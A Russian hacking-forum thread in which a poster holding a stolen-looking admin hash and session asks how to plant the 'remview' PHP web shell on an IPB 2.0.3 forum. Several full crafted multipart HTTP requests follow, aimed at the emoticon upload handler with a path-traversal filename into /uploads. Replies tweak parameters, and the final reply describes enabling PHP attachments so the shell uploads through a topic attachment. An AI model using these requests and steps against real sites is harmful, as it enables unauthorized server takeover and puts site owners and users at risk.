Форум АНТИЧАТ - Вопрос про заливку шелла в IPB, посредством программы InetCrack

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

Вопрос про заливку шелла в IPB, посредством программы InetCrack

Господа, здравствуйте!
Есть форум IPB 2.0.3
Есть hash админа
Есть session_id админа
Собственно и в админку могу зайти (пароль админа тоже знаю)
Но пермишны на папку со смайлами стоят неправильные и remview туда залить не могу.
Попытался InetCrack-ом по статье товарища Algol-а (http://antichat.ru/txt/IPB) подменить запрос чтобы залить remview в /uploads (эта папка открыта на запись), но не получилось.
Вот что я делал
1. Взял InetCrack
2. Пишу вот такой запрос в InetCrack-е

--------

POST http://АДРЕС_ФОРУМА/admin.php?adsess=СЕССИЯ_АДМИНА HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://АДРЕС_ФОРУМА/admin.php?adsess...ct=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=ID_АДМИНА; pass_hash=ХЕШ_АДМИНА;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

СЕССИЯ_АДМИНА
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/REMVIEW.PHP"
Content-Type: application/octet-stream

Сюда, я так понял нада писать код remview-а
-----------------------------7d43942c405bc--

--------

В ответ получаю ответ сервера и когда клацаю в InetCrack-е кнопку "Show body in browser" появляется окно броузера, в котором вижу кусок админки IPB-форума с надписью "Вы не выбрали папку для загрузки смайликов"
При этом ни в папке смайлов ни в папке /uploads не появляется файл remview.php

Подскажите, пожалуйста, что я делаю не так
Может не тот запрос в InetCrack запихиваю
Не могли бы написать 100%-но рабочий HTTP-запрос для IPB версии 2.0.3
Заранее очень благодарен!!!

Еще я понял, что можно как-то через заливку аватаров попытаться залить remview.
Подскажите, пожалуйста, как???

Проверь правильность session_id Админа.

В IPB 2.0.3 надо ставить не admin.php?adsess= , а admin.php?s=

Цитата:

Сообщение от bul666

Проверь правильность session_id Админа.

дык я ж ее беру из ссылки
Т.е. захожу в админку под логином/паролем админа и из УРЛ-а браузера беру session_id
Тем более если бы был неправильный session_id, то я думаю, что мне бы это написало, а так пишел, что я не выбрал папку для загрузки смайлика

Я не понял где файл который ты загружаешь?

Цитата:

Сообщение от S1nt3z

В IPB 2.0.3 надо ставить не admin.php?adsess= , а admin.php?s=

тока шо зашел на тот форум под логино/паролем и урл выглядит вот в таком формате
http://АДРЕС_ФОРУМА/admin.php?printframes=1&adsess=СЕССИЯ_АДМИНА&
т.е. получается все-таки admin.php?adsess=, а не admin.php?s=

Цитата:

Сообщение от bul666

Я не понял где файл который ты загружаешь?

да я так понял что нада не файл, а сам КОД этого файла писать в НТТР-запрос
Вот сюда
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/REMVIEW.PHP"
Content-Type: application/octet-stream

ВОТ СЮДА ПИШУ КОД remview.php
-----------------------------7d43942c405bc--

Других методов как его приаттачить я не вижу

А все-таки попробуй по совету S1nt3za Отпровь в Инет Кряке запрос с алреслом : POST http://АДРЕС_ФОРУМА/admin.php?s=СЕССИЯ_АДМИНА HTTP/1.0

Поставил admin.php?s=
не помогло
еще нашел что вместо act=op нада писать act=admin

В итоге вот что получилось

POST http://АДРЕС_ФОРУМА/admin.php? HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://АДРЕС_ФОРУМА/admin.php?act=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=3; pass_hash=ХЕШ_АДМИНА;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

0ba3d31d16ebfc45939b7a14e510742f
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

admin
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/ad_smiles.php"
Content-Type: application/octet-stream

--CODE HERE--
-----------------------------7d43942c405bc--

все-равно не помогает
та же херня "Вы не выбрали директорию для загрузки смайлов"

Господа, ну помогите, пожалуйста!!!

Короче самый лёгкий способ это прицепить remview.php в темку (перед этим надо разрешить прикрепление php в темки) он автоматически зальётся в папку uploads , а далее дело техники !